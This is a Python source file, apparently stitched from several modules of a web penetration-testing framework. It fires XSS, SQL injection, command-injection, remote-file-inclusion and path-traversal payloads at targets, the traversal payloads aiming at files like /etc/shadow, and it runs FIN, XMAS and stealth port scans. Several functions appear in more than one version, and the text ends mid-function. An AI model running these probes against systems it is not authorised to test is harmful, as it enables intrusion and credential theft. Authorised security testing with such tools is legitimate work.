def xssref0x00(web, parallel):
    """Run the referrer-based XSS payload check against ``web`` and record the outcome.

    The module-level payload list ``pay`` is handed to ``refatck`` in one
    call, or, when ``parallel`` is truthy, split by ``listsplit`` into chunks
    dispatched to a ``multiprocessing.Pool`` of ``processes`` workers.
    Whatever ``refatck`` returns is accumulated (presumably the payloads that
    were reflected -- confirm against ``refatck``), written through
    ``save_data`` and echoed to the console.
    """
    print(R + '\n X S S (Referrer Based)')
    print(R + ' ---<>----<>----<>----<>----\n')

    hits = []
    if parallel:
        chunks = listsplit(pay, round(len(pay) / processes))
        with Pool(processes=processes) as pool:
            jobs = [pool.apply_async(refatck, args=(chunk, web)) for chunk in chunks]
            # Collect inside the with-block: leaving it terminates the pool.
            for job in jobs:
                hits += job.get()
    else:
        hits += refatck(pay, web)

    if not hits:
        data = "(referrer) no payload succeeded."
        save_data(database, module, lvl1, lvl2, lvl3, name, data)
        print(R + "\n [-] No payload succeeded." + C)
        return

    data = "XSS Vulnerability (Referrer) found! Payloads :> " + str(hits)
    save_data(database, module, lvl1, lvl2, lvl3, name, data)
    print(" [+] XSS Vulnerability (Referrer) found! Successful payloads:")
    for payload in hits:
        print(payload)
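def xsspoly0x00(li, bug2, parallel):
    """Run the polyglot payload list ``poly`` against the endpoint ``li``.

    ``li`` is the URL prefix ending at the parameter under test and ``bug2``
    is the remainder of the query string. Nothing is tested unless ``li``
    contains both ``?`` and ``=``. With ``parallel`` set, ``poly`` is split
    into chunks and ``polyatck`` runs in a ``multiprocessing.Pool``.
    """
    success = []
    print(R + '\n X S S (Polyglot Fuzzer)')
    print(R + ' ——·‹›·––·‹›·——·‹›·——·‹›·––\n')
    try:
        if '?' in str(li) and '=' in str(li):
            if not parallel:
                success += polyatck(poly, li, bug2)
            else:
                paylists = listsplit(poly, round(len(poly) / processes))
                with Pool(processes=processes) as pool:
                    res = [
                        pool.apply_async(polyatck, args=(chunk, li, bug2))
                        for chunk in paylists
                    ]
                    # Results must be fetched before the pool is torn down.
                    for pending in res:
                        success += pending.get()
            if success:
                print(" [+] XSS Vulnerability (Polyglot) found! Successful payloads:")
                for payload in success:
                    print(payload)
            else:
                print(R + "\n [-] No payload succeeded." + C)
    except KeyboardInterrupt:
        # The handler used to claim the payload file was missing, which is
        # unrelated to a Ctrl-C and would mislead anyone reading the output.
        print(R + ' [-] User Interruption Detected!')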
def atck(evasion, filepath, payloads, web00, bug2, parallel, gen_headers):
    """Request ``web00 + payload + bug2`` for each path payload and sort the results.

    ``check0x00`` (serial) or ``chkpre`` (parallel) returns six sequences per
    call; they are merged, in order, into the interesting, generic, log,
    environ, fd and configuration buckets. When ``evasion`` is set and
    ``filepath`` is non-empty, the literal ``etc/shadow`` inside a payload is
    replaced by ``filepath`` before the request (serial path only; the
    parallel path forwards both values to ``chkpre``).
    """
    gotcha, generic, loggy, enviro, fud, cnfy = [], [], [], [], [], []
    # Order matches the index layout of the tuples returned by the checkers.
    buckets = (gotcha, generic, loggy, enviro, fud, cnfy)

    def merge(paths):
        for idx, bucket in enumerate(buckets):
            bucket.extend(paths[idx])

    if parallel:
        print(round(len(payloads) / processes))
        chunks = listsplit(payloads, round(len(payloads) / processes))
        with Pool(processes=processes) as pool:
            jobs = [
                pool.apply_async(
                    chkpre,
                    args=(evasion, filepath, chunk, web00, bug2, gen_headers),
                )
                for chunk in chunks
            ]
            for job in jobs:
                merge(job.get())
    else:
        for candidate in payloads:
            if evasion and filepath != "":
                candidate = candidate.replace("etc/shadow", filepath)
            print(GR + '\n [*] Setting parameters...')
            web0x00 = web00 + candidate + bug2
            print(C + ' [+] Using path : ' + B + str(candidate))
            print(B + ' [+] Url : ' + GR + str(web0x00))
            merge(check0x00(web0x00, candidate, gen_headers))

    if not gotcha:
        print(R + ' [-] No vulnerable paths found!')
        return

    print(G + "\n [+] Retrieved %s interesting paths...\n" % str(len(gotcha)))
    time.sleep(0.5)
    for title, found in (
        ("Logs", loggy),
        ("/proc/self/environ", enviro),
        ("/proc/self/fd", fud),
        ("Configuration", cnfy),
        ("Generic", generic),
    ):
        outto0x00(title, found)
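def sqliuser0x00(web, parallel):
    """Probe ``web`` for blind SQL injection through the User-Agent header.

    A baseline response is fetched first; each payload from ``pay`` is then
    appended to a fixed User-Agent string and the response length is compared
    with the baseline. A differing length is reported as a hit.

    Length comparison is a weak signal: pages with dynamic content (tokens,
    timestamps, ads) differ between requests without any injection, so hits
    need manual confirmation.
    """
    print(R+'\n S Q L i (User-Agent Based)')
    print(R+' ––·‹›·––·‹›·––·‹›·––·‹›·––·‹›\n')
    requests = session()
    # NOTE(review): verify=False turns off TLS certificate validation for the
    # baseline and every probe, so the responses being compared are not
    # authenticated and may come from an intermediary rather than the target.
    getrq = requests.get(web, verify=False)
    success = []
    if not parallel:
        for i in pay:
            print(B+'\n [*] Using payload : '+C+i)
            time.sleep(0.7)
            user_agent = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux' +
                          'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'}
            user_agent['User-agent'] += str(i)
            req = requests.get(web, headers=user_agent, verify=False)
            print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['User-agent'])
            if len(req.content) != len(getrq.content):
                print(G+' [!] Blind based SQLi (User-Agent Based) Detected!')
                print(R+' [!] User-Agent : '+O+user_agent['User-agent'])
                # The serial path never recorded its hits, so the summary
                # below always reported "No payload succeeded".
                success.append(i)
    else:
        paylists = listsplit(pay, round(len(pay)/processes))
        with Pool(processes=processes) as pool:
            res = [pool.apply_async(userpre, args=(web, l, getrq,)) for l in paylists]
            for i in res:
                j = i.get()
                success += j
    if success:
        # Was labelled "(Cookie)", which misattributes the finding.
        print(" [+] SQLi Vulnerability (User-Agent) found! Successful payloads:")
        for i in success:
            print(i)
    else:
        print(R + "\n [-] No payload succeeded."+C)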
def xssref0x00(web, parallel):
    """Run the referrer-based XSS payload check against ``web`` and print the result.

    ``refatck`` is called once with the whole module-level ``pay`` list, or,
    when ``parallel`` is truthy, once per chunk inside a
    ``multiprocessing.Pool``. Its return values are concatenated and listed
    on the console; nothing is persisted by this variant.
    """
    print(R + '\n X S S (Referrer Based)')
    print(R + ' ——·‹›·––·‹›·——·‹›·——·‹›·––·\n')

    found = []
    if parallel:
        batches = listsplit(pay, round(len(pay) / processes))
        with Pool(processes=processes) as pool:
            handles = [pool.apply_async(refatck, args=(batch, web)) for batch in batches]
            # Fetch before the with-block exits and terminates the workers.
            for handle in handles:
                found += handle.get()
    else:
        found += refatck(pay, web)

    if not found:
        print(R + "\n [-] No payload succeeded." + C)
        return

    print(" [+] XSS Vulnerability (Referrer) found! Successful payloads:")
    for entry in found:
        print(entry)
def xsscookie0x00(web, parallel):
    """Run the cookie-based XSS payload check against ``web``.

    A session is opened with one GET to ``web``. If the server set no
    cookies the check is skipped; otherwise ``cookieatck`` is run over the
    module-level ``pay`` list (in a ``multiprocessing.Pool`` when
    ``parallel`` is truthy) and its results are printed.
    """
    print(R+'\n X S S (Cookie Based)')
    print(R+' ——·‹›·––·‹›·——·‹›·——·‹›\n')
    sleep(0.5)
    vsession = session()
    vsession.get(web)

    if not vsession.cookies:
        print(R+' [-] No support for cookies...')
        time.sleep(0.5)
        print(R+' [-] Cookie based injection not possible...')
        return

    print(G+' [+] This website supports session cookies...')
    found = []
    if parallel:
        batches = listsplit(pay, round(len(pay)/processes))
        with Pool(processes=processes) as pool:
            handles = [
                pool.apply_async(cookieatck, args=(batch, vsession, web))
                for batch in batches
            ]
            for handle in handles:
                found += handle.get()
    else:
        found += cookieatck(pay, vsession, web)

    if found:
        print(" [+] XSS (Cookie) Vulnerability found! Successful payloads:")
        for entry in found:
            print(entry)
    else:
        print(R + "\n [-] No payload succeeded."+C)
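def manual0x00(web, parallel):
    """Interactively pick an endpoint and parameter, then run the XSS payload check.

    The operator types a path with a query string. When it holds several
    parameters the operator names the one to test; ``bugs`` becomes the URL
    up to and including ``<param>=`` and ``bug2`` the trailing parameters.
    ``manualatck`` is then run over the module-level ``pay`` list, optionally
    followed by the polyglot check. Input without ``?`` and ``=`` is rejected
    and the prompt is repeated (by recursion).
    """
    print(R + '\n X S S (Manual Mode)')
    print(R + ' ——·‹›·––·‹›·——·‹›·––·‹\n')
    bug = input(O + ' [#] Injectable Endpoint' + R +
                ' (eg. /xss/search.php?q=drake)' + O + ' :> ')
    choice = ""
    if "&" in bug:
        ln = len(bug.split("&"))
        choice = input(
            " [!] Discovered {} parameters. Which one to use? (enter name) :> "
            .format(ln))
        if choice not in bug:
            sys.exit(" [-] Param {} not found.".format(choice))
    bugs = web + bug.split(choice + '=')[0] + choice + '='
    bug2 = ""
    if choice != "":
        n = bug.split(choice + "=")[1]
        if "&" in n:
            # Drop the chosen parameter's own value, keep "&other=..." as suffix.
            bug2 = bug.split(choice)[1]
            tmp = bug2.split("&")[0]
            bug2 = bug2.replace(tmp, "")
    print(O + ' [!] Using Url : ' + GR + bugs + "INJECT" + bug2)
    if '?' in str(bugs) and '=' in str(bugs):
        success = []
        if not parallel:
            # The return value was discarded here, so the serial path always
            # ended with "No payload succeeded" regardless of the outcome.
            success += manualatck(pay, bugs, bug2)
        else:
            paylists = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(manualatck, args=(l, bugs, bug2,))
                    for l in paylists
                ]
                for y in res:
                    i = y.get()
                    success += i
        if success:
            print(" [+] XSS Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
        x = input(O + ' [#] Test Polyglots? (Y/n) :> ')
        if x == 'Y' or x == 'y':
            print(GR + ' [*] Proceeding fuzzing with polyglots...')
            xsspoly0x00(bugs, bug2, parallel)
        elif x == 'n' or x == 'N':
            print(C + ' [+] Okay!')
        else:
            print(GR + ' [-] U high dude?')
    else:
        print(R + ' [-] Enter an URL with scope parameter...')
        manual0x00(web, parallel)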
def sqlicookie0x00(web, parallel):
    """Probe ``web`` for error-based SQL injection through session cookies.

    After one GET to obtain cookies, every payload in the module-level
    ``pay`` list is appended to each cookie value, the page is requested
    again and the body is searched for the database error markers in
    ``check``. The parallel path delegates the same work to ``cookiepre``.
    """
    print(R + '\n S Q L i (Cookie Based)')
    print(R + ' ––·‹›·––·‹›·––·‹›·––·‹›·–\n')
    sleep(0.5)
    vsession = session()
    req = vsession.get(web)
    check = ["have an error", "SQL syntax", "MySQL"]

    if not vsession.cookies:
        print(R + ' [-] No support for cookies...')
        time.sleep(0.5)
        print(R + ' [-] Cookie based injection not possible...')
        return

    print(G + ' [+] This website values session cookies...')
    success = []
    if parallel:
        batches = listsplit(pay, round(len(pay) / processes))
        with Pool(processes=processes) as pool:
            handles = [
                pool.apply_async(cookiepre, args=(batch, vsession, check, req))
                for batch in batches
            ]
            for handle in handles:
                success += handle.get()
    else:
        for i in pay:
            print(B + " [*] Trying Payload : " + C + '' + i)
            time.sleep(0.7)
            for cookie in vsession.cookies:
                # NOTE(review): the cookie value is never reset, so each
                # payload is appended to a value that already carries the
                # earlier ones -- confirm this accumulation is intended.
                cookie.value += i
                print(O + ' [+] Using ' + R + '!nfected' + O + ' cookie : ' +
                      GR + cookie.value)
                r = vsession.get(web)
                for marker in check:
                    if marker in r.text:
                        poc = (C + " [+] PoC : " + O + cookie.name + " : " +
                               GR + cookie.value)
                        print(G + " [+] Error Based SQli (Cookie Based) Detected! ")
                        print(poc)
                        print(P + ' [+] Code : ' + W + str(r.text) + '\n')
                        success.append(i)

    if success:
        print(" [+] SQLi Vulnerability found! Successful payloads:")
        for entry in success:
            print(entry)
    else:
        print(R + "\n [-] No payload succeeded." + C)
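def manual0x00(web, parallel):
    """Interactively pick an endpoint and parameter, then run the SQLi payload check.

    The operator supplies a path with a query string and, if it has several
    parameters, names the one to test. Each payload from the module-level
    ``pay`` list is appended to that parameter's value and the response body
    is searched for database error text. Input without ``?`` and ``=`` is
    rejected and the prompt is repeated (by recursion).
    """
    print(R+'\n S Q L i (Manual Mode)')
    print(R+' ––·‹›·––·‹›·––·‹›·––·‹›·\n')
    requests = session()
    bug = input(O+' [#] Injectable Endpoint'+R+' (eg. /sqli/fetch.php?id=x)'+O+' :> ')
    choice = ""
    if "&" in bug:
        ln = len(bug.split("&"))
        choice = input(" [!] Discovered {} parameters. Which one to use? (enter name) :> ".format(ln))
        if choice not in bug:
            sys.exit(" [-] Param {} not found.".format(choice))
    bug2 = ""
    param1 = ""
    if choice != "":
        n = bug.split(choice + "=")[1]
        if "&" in n:
            # param1 is the chosen parameter's original value; bug2 keeps the
            # "&other=..." suffix that follows it.
            bug2 = bug.split(choice+"=")[1]
            param1 = bug2.split("&")[0]
            bug2 = bug2.replace(param1, "")
    bugs = web + bug.split(choice + '=')[0] + choice + '=' + param1
    print(O+' [!] Using Url : '+GR+bugs)
    if '?' in str(bugs) and '=' in str(bugs):
        success = []
        if not parallel:
            for p in pay:
                bugged = bugs + str(p) + bug2
                print(B+" [*] Trying : "+C+bugged)
                time.sleep(0.7)
                response = requests.get(bugged).text
                # `and` binds tighter than `or`: a bare PHP 'Warning:' in the
                # body is enough to count as a hit, so expect false positives.
                if (('error' in response and 'syntax' in response and 'SQL' in response)
                        or 'Warning:' in response):
                    print('\n'+G+' [+] Vulnerable link detected : ' + bugged)
                    print(GR+' [*] Injecting payloads...')
                    print(B+' [!] PoC : ' + str(bugged))
                    print(R+" [!] Payload : " + O + p + '\033[0m')
                    print("\033[1m [!] Code Snippet :\n \033[0m" + str(response) + '\n')
                    # Hits were never recorded on the serial path, so the
                    # summary contradicted the detection printed above.
                    success.append(p)
        else:
            paylists = listsplit(pay, round(len(pay)/processes))
            with Pool(processes=processes) as pool:
                res = [pool.apply_async(manualpre, args=(l, bugs, bug2,)) for l in paylists]
                for i in res:
                    j = i.get()
                    success += j
        if success:
            print(" [+] SQLi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded."+C)
    else:
        print(R+' [-] Enter an URL with scope parameter...')
        manual0x00(web, parallel)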
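def sqliuser0x00(web, parallel):
    """Probe ``web`` for error-based SQL injection through the User-Agent header.

    Each payload from the module-level ``pay`` list is appended to a fixed
    User-Agent string; the response body is then searched for the words
    ``error``, ``syntax`` or ``mysql``. The outcome is written through
    ``save_data`` and printed.

    The keyword match is broad: any page that mentions "error" counts as a
    hit, so results need manual confirmation.
    """
    print(R + '\n S Q L i (User-Agent Based)')
    print(R + ' ---<>----<>----<>----<>----<>\n')
    success = []
    requests = session()
    if not parallel:
        for i in pay:
            print(B + ' [*] Using payload : ' + C + i)
            time.sleep(0.7)
            user_agent = {
                'User-agent':
                'Mozilla/5.0 (X11; Ubuntu; Linux' +
                'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
            }
            user_agent['User-agent'] += i
            req = requests.get(web, headers=user_agent)
            print(O + ' [*] Using ' + R + '!nfected' + O + ' UA : ' + GR +
                  user_agent['User-agent'])
            # `" ".join(req.text)` put a space between every character, so
            # none of the multi-letter keywords below could ever match.
            flag = req.text.strip()
            if 'error' in flag or 'syntax' in flag or 'mysql' in flag.lower():
                print(G + '\n [!] Error based SQLi (User-Agent Based) Detected!')
                print(R + ' [!] User-Agent : ' + O + user_agent['User-agent'])
                success.append(i)
    else:
        paylists = listsplit(pay, round(len(pay) / processes))
        with Pool(processes=processes) as pool:
            res = [pool.apply_async(userpre, args=(l, web,)) for l in paylists]
            for i in res:
                j = i.get()
                success += j
    if success:
        data = "SQLi Vulnerability (useragent) found!\nSuccessful payloads: " + str(
            success)
        save_data(database, module, lvl1, lvl2, lvl3, name, data)
        print(" [+] SQLi Vulnerability (useragent) found! Successful payloads:")
        for i in success:
            print(i)
    else:
        print(R + "\n [-] No payload succeeded." + C)
        save_data(database, module, lvl1, lvl2, lvl3, name,
                  "(useragent) no payload succeeded.")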
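def brute0x00(web, parallel):
    """Load a path wordlist and run the remote-file-inclusion check against ``web``.

    The wordlist path comes from ``properties["DICT"][1]``: a single space
    means "ask the operator", ``none`` or an empty answer selects the default
    ``files/fuzz-db/rfi_paths.lst``. Lines are appended to the module-level
    ``payloads`` list and passed to ``checkbrute`` (in a
    ``multiprocessing.Pool`` when ``parallel`` is truthy). The outcome is
    written through ``save_data`` and printed.
    """
    try:
        if properties["DICT"][1] == " ":
            print(O + ' [!] Enter path to payload file ' + R +
                  '(Default: files/fuzz-db/rfi_paths.lst)')
            fi = input(O + ' [§] Your input (Press Enter if default) :> ')
        elif properties["DICT"][1].lower() == "none":
            fi = ""
        else:
            fi = properties["DICT"][1]
        if fi == '':
            fi = 'files/fuzz-db/rfi_paths.lst'
        print(GR + ' [*] Importing wordlist...')
        if not os.path.isfile(fi):
            # A missing wordlist used to pass without any message; say so and
            # stop instead of running with whatever `payloads` already holds.
            print(R + ' [-] Wordlist not found: ' + fi)
            return
        print(G + ' [+] File path found!')
        time.sleep(0.6)
        print(O + ' [*] Importing wordlist...')
        with open(fi, 'r') as wew:
            for w in wew:
                payloads.append(w.strip('\n'))
        print(GR + ' [*] Starting bruteforce...')
        time.sleep(0.7)
        success = []
        if not parallel:
            success += checkbrute(payloads, web)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(checkbrute, args=(l, web,))
                    for l in paylists
                ]
                for y in res:
                    i = y.get()
                    success += i
        if success:
            data = "Possible RFI at: " + str(success)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] Remote File Inclusion found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "(brute) no payload succeeded.")
    except Exception as e:
        # Top-level boundary for this module: report and return to the menu.
        print(R + ' [-] Unexpected Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))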
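def getPayloads(url, parallel):
    """Load the command-injection payload list and run ``check0x00`` against ``url``.

    The payload file comes from ``properties["DICT"][1]`` (a single space
    prompts the operator; ``none`` or an empty answer selects
    ``files/payload-db/rce_payloads.lst``). Lines are appended to the
    module-level ``payloads`` list. Responses are matched against ``check``,
    a case-insensitive pattern of marker strings.

    The pattern includes very common words such as ``root`` and ``Linux``, so
    an ordinary page can match without any command having run; treat hits as
    leads to verify.
    """
    if properties["DICT"][1] == " ":
        print(O + ' [!] Enter path to payload file ' + R +
              '(Default: files/payload-db/rce_payloads.lst)')
        fi = input(O + ' [§] Your input (Press Enter if default) :> ')
    elif properties["DICT"][1].lower() == "none":
        fi = ""
    else:
        fi = properties["DICT"][1]
    if fi == '':
        fi = 'files/payload-db/rce_payloads.lst'
    print(GR + ' [*] Loading payloads...')
    time.sleep(0.8)
    try:
        with open(fi) as run:
            for p in run:
                payloads.append(p.replace('\n', ''))
    except Exception as e:
        print(R + ' [-] Exception: ' + str(e))
    # The count used to be reported as len(payloads) + 1, one more than loaded.
    print(G + ' [+] ' + str(len(payloads)) + ' Payloads loaded!')
    # Raw string: the pattern is unchanged, but `\(` and `\[` are no longer
    # invalid string escapes.
    check = re.compile(
        r"51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot|root|x:bin",
        re.I)
    print(GR + ' [*] Starting command injection testing...')
    success = []
    if not parallel:
        # The return value was dropped, so the serial path always printed
        # "No payload succeeded".
        success += check0x00(url, payloads, check)
    else:
        paylists = listsplit(payloads, round(len(payloads) / processes))
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(check0x00, args=(url, l, check,))
                for l in paylists
            ]
            for y in res:
                i = y.get()
                success += i
    if success:
        print(" [+] CMDi Vulnerability found! Successful payloads:")
        for i in success:
            print(i)
    else:
        print(R + "\n [-] No payload succeeded." + C)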
def xsscookie0x00(web, parallel):
    """Run the cookie-based XSS payload check against ``web`` and record the outcome.

    One GET opens the session. Without cookies the check is skipped and that
    fact is stored; otherwise ``cookieatck`` runs over the module-level
    ``pay`` list (in a ``multiprocessing.Pool`` when ``parallel`` is truthy).
    Every branch writes one record through ``save_data``.
    """
    print(R + '\n X S S (Cookie Based)')
    print(R + ' ---<>----<>----<>----<>\n')
    sleep(0.5)
    vsession = session()
    vsession.get(web)

    if not vsession.cookies:
        print(R + ' [-] No support for cookies...')
        time.sleep(0.5)
        print(R + ' [-] Cookie based injection not possible...')
        data = "No support for cookies. Cookie based injection not possible."
        save_data(database, module, lvl1, lvl2, lvl3, name, data)
        return

    print(G + ' [+] This website supports session cookies...')
    found = []
    if parallel:
        batches = listsplit(pay, round(len(pay) / processes))
        with Pool(processes=processes) as pool:
            handles = [
                pool.apply_async(cookieatck, args=(batch, vsession, web))
                for batch in batches
            ]
            # Fetch before the with-block exits and terminates the workers.
            for handle in handles:
                found += handle.get()
    else:
        found += cookieatck(pay, vsession, web)

    if found:
        data = "XSS Vulnerability (Cookie) found! Payloads :> " + str(found)
        save_data(database, module, lvl1, lvl2, lvl3, name, data)
        print(" [+] XSS (Cookie) Vulnerability found! Successful payloads:")
        for entry in found:
            print(entry)
    else:
        data = "(cookie) no payload succeeded."
        save_data(database, module, lvl1, lvl2, lvl3, name, data)
        print(R + "\n [-] No payload succeeded." + C)
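def scan0x00(target):
    """Run the FIN scan module against ``target`` and print/store a port table.

    The port range and verbosity come from ``properties`` (a single space
    means "ask the operator"). The range is split with ``listsplit`` and each
    chunk is handed to ``portloop`` in a ``multiprocessing.Pool``; each result
    is read as (open|filtered, closed, filtered) port lists.
    """
    try:
        from core.methods.print import pscan
        pscan("fin scan")
        print(''+R + ' [Reliable only in LA Networks]\n')
        if properties["INIT"][1] == " ":
            min_port = input(C+' [§] Enter initial port :> ')
        else:
            min_port = properties["INIT"][1]
        if properties["FIN"][1] == " ":
            max_port = input(C+' [§] Enter ending port :> ')
        else:
            max_port = properties["FIN"][1]
        openfil_ports = []
        filter_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        if properties["VERBOSE"][1] == " ":
            chk = input(C+' [?] Do you want a verbose output? (enter if not) :> ')
            verbose = chk != ""
        else:
            verbose = properties["VERBOSE"][1] == "1"
        try:
            print(GR+' [*] Checking port range...')
            # 65535 is the highest valid port; the old bound accepted 65536.
            if 0 <= int(min_port) <= int(max_port) <= 65535:
                print(P+' [!] Port range detected valid...'+C)
                time.sleep(0.3)
                print(GR+' [*] Preparing for the the FIN Scan...')
            else:
                print(R+"\n [!] Invalid Range of Ports")
                print(R+" [!] Exiting...")
                quit()
        except Exception:
            # Non-numeric input lands here (int() raised).
            print(R+"\n [!] Invalid Range of Ports")
            print(R+" [!] Exiting...")
            quit()
        ports = range(int(min_port), int(max_port)+1)
        starting_time = time.time()
        checkhost(ip_host)
        print(G+" [!] Scanning initiated at " + strftime("%H:%M:%S") + "!"+C+color.TR2+C+"\n")
        prtlst = listsplit(ports, round(len(ports)/processes))
        with Pool(processes=processes) as pool:
            res = [pool.apply_async(portloop, args=(l, verbose, ip_host,)) for l in prtlst]
            for i in res:
                j = i.get()
                openfil_ports += j[0]
                closed_ports += j[1]
                filter_ports += j[2]
        print(G+"\n [!] Scanning completed at %s" % (time.strftime("%I:%M:%S %p"))+C+color.TR2+C)
        ending_time = time.time()
        total_time = ending_time - starting_time
        print(P+' [*] Preparing report...\n'+C)
        time.sleep(1)
        openports = " {}{}{}{}{}{}{}{} ports open.".format(
            color.TR5, C, G, str(len(openfil_ports)), color.END, color.TR2,
            color.END, color.CURSIVE)
        summary("finscan", openports)

        border = P+' +--------+------------------+'

        def show_row(port, state):
            # One padded row replaces the five per-digit-count branches; the
            # widths follow the border (8 and 18 columns, one leading space).
            print(P+' | '+C+str(port).ljust(7)+P+'| '+C+state.ljust(17)+P+'|')
            print(border)
            time.sleep(0.2)

        print()
        print(border)
        print(P+' | '+C+'PORT'.ljust(7)+P+'| '+C+'STATE'.ljust(17)+P+'|')
        print(border)
        if openfil_ports:
            for i in sorted(openfil_ports):
                show_row(i, 'OPEN')
            data = "Open Ports: " + str(openfil_ports)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        if filter_ports:
            for i in sorted(filter_ports):
                show_row(i, 'FILTERED')
            data = "Filtered Ports: " + str(filter_ports)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        if openfil_ports or filter_ports:
            print('')
        else:
            # Only record "nothing found" when both lists really are empty.
            print(''+R+" [-] No open/filtered ports found.!!"+'')
            save_data(database, module, lvl1, lvl2, lvl3, name, "No open/filtered ports found.")
        print(B+"\n [!] " + str(len(closed_ports)) + ' closed ports not shown')
        print(G+" [+] Host %s scanned in %s seconds" % (target, total_time)+C+color.TR2+C+"\n")
    except KeyboardInterrupt:
        print(R+"\n [-] User Requested Shutdown...")
        print(" [*] Exiting...")
        quit()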
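def scan0x00(target):
    """Run the XMAS scan module against ``target`` and print a port table.

    The operator enters the port range and verbosity. The range is split with
    ``listsplit`` and each chunk is handed to ``portloop`` in a
    ``multiprocessing.Pool``; each result is read as
    (open|filtered, filtered, closed) port lists.
    """
    try:
        from core.methods.print import pscan
        pscan("xmas scan")
        print(R + ' [Reliable only in LA Networks]\n')
        min_port = input(O + " [#] Enter Minumum Port Number -> ")
        max_port = input(O + " [#] Enter Maximum Port Number -> ")
        openfil_ports = []
        filter_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        chk = input(C + ' [#] Do you want a verbose output? (enter if not) :> ')
        # `is not ""` compared identity, not content; the result depended on
        # string interning and raises a SyntaxWarning on current Python.
        verbose = chk != ""
        try:
            print(GR + ' [*] Checking port range...')
            # 65535 is the highest valid port; the old bound accepted 65536.
            if 0 <= int(min_port) <= int(max_port) <= 65535:
                print(G + '\033[1;32m [+] Port range detected valid...')
                time.sleep(0.3)
                # Message used to announce a FIN scan (copy-paste leftover).
                print(GR + ' [*] Preparing for the XMAS Scan...')
            else:
                print(R + "\n [!] Invalid Range of Ports")
                print(" [!] Exiting...")
                quit()
        except Exception:
            # Non-numeric input lands here (int() raised).
            print("\n\033[91m [!] Invalid Range of Ports")
            print(" [!] Exiting...")
            quit()
        ports = range(int(min_port), int(max_port) + 1)
        prtlst = listsplit(ports, round(len(ports) / processes))
        starting_time = time.time()

        def checkhost(ip):
            """Send one ICMP echo to ``ip``; exit if sending raises."""
            conf.verb = 0  # silence scapy output
            try:
                sr1(IP(dst=ip) / ICMP())
                print("\n\033[1;32m [!] Target server detected online...")
                time.sleep(0.6)
                print(' [*] Beginning scan...')
            except Exception:
                print("\n\033[91m [!] Couldn't Resolve Target")
                print(" [!] Exiting...")
                quit()

        checkhost(ip_host)
        print(G + " [*] Scanning initiated at " + strftime("%H:%M:%S") + "!\n")
        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(l, verbose, ip_host,))
                for l in prtlst
            ]
            for i in res:
                j = i.get()
                openfil_ports += j[0]
                filter_ports += j[1]
                closed_ports += j[2]
        print("\n [!] Scanning completed at %s" % (time.strftime("%I:%M:%S %p")))
        ending_time = time.time()
        total_time = ending_time - starting_time
        print(GR + ' [*] Preparing report...\n')
        time.sleep(1)
        print(O + ' ' + R + 'SCAN REPORT ' + O + ' ')
        print(O + ' ––·‹›·––·‹›·–––')
        print()

        border = O + ' +--------+------------------+'

        def show_row(port, state, tint):
            # One padded row replaces the five per-digit-count branches; the
            # widths follow the border (8 and 18 columns, one leading space).
            print(O + ' | ' + C + str(port).ljust(7) + O + '| ' + tint +
                  state.ljust(17) + O + '|')
            print(border)
            time.sleep(0.2)

        print(border)
        print(O + ' | ' + GR + 'PORT'.ljust(7) + O + '| ' + GR +
              'STATE'.ljust(17) + O + '|')
        print(border)
        if openfil_ports:
            for i in sorted(openfil_ports):
                show_row(i, 'OPEN', G)
        if filter_ports:
            for i in sorted(filter_ports):
                show_row(i, 'FILTERED', GR)
        else:
            print('' + R + " [-] No filtered ports found.!!" + O + '')
        print(B + "\n [!] " + str(len(closed_ports)) + ' closed ports not shown')
        print(O + " [!] Host %s scanned in %s seconds\n" % (target, total_time))
    except KeyboardInterrupt:
        print("\n\033[91m [*] User Requested Shutdown...")
        print(" [*] Exiting...")
        quit()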
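def scan0x00(target):
    """Run the TCP stealth scan module against ``target`` and print a port table.

    The port range and verbosity come from ``properties`` (a single space
    means "ask the operator"). The range is split with ``listsplit`` and each
    chunk is handed to ``portloop`` in a ``multiprocessing.Pool``; each result
    is read as (open, closed) port lists.
    """
    try:
        from core.methods.print import pscan
        pscan("tcp stealth scan")
        if properties["INIT"][1] == " ":
            min_port = input(O + ' [#] Enter initial port :> ')
        else:
            min_port = properties["INIT"][1]
        if properties["FIN"][1] == " ":
            max_port = input(O + ' [#] Enter ending port :> ')
        else:
            max_port = properties["FIN"][1]
        open_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        if properties["VERBOSE"][1] == " ":
            chk = input(
                C + ' [#] Do you want a verbose output? (enter if not) :> ')
            # `is not ""` compared identity, not content; use a value test.
            verbose = chk != ""
        else:
            verbose = properties["VERBOSE"][1] == "1"
        try:
            print(GR + ' [*] Checking port range...')
            # 65535 is the highest valid port; the old bound accepted 65536.
            if 0 <= int(min_port) <= int(max_port) <= 65535:
                print('\033[1;32m [!] Port range detected valid...')
                time.sleep(0.3)
                print(GR + ' [*] Preparing for the the Scan...')
            else:
                print("\n\033[91m [!] Invalid Range of Ports")
                print(" [!] Exiting...")
                quit()
        except Exception:
            # Non-numeric input lands here (int() raised).
            print("\n\033[91m [!] Invalid Range of Ports")
            print(" [!] Exiting...")
            quit()
        ports = range(int(min_port), int(max_port) + 1)
        prtlst = listsplit(ports, round(len(ports) / processes))
        starting_time = time.time()
        checkhost(target)
        print(O + " [*] Scanning initiated at " + strftime("%H:%M:%S") + "!\n")
        with Pool(processes=processes) as pool:
            res = [
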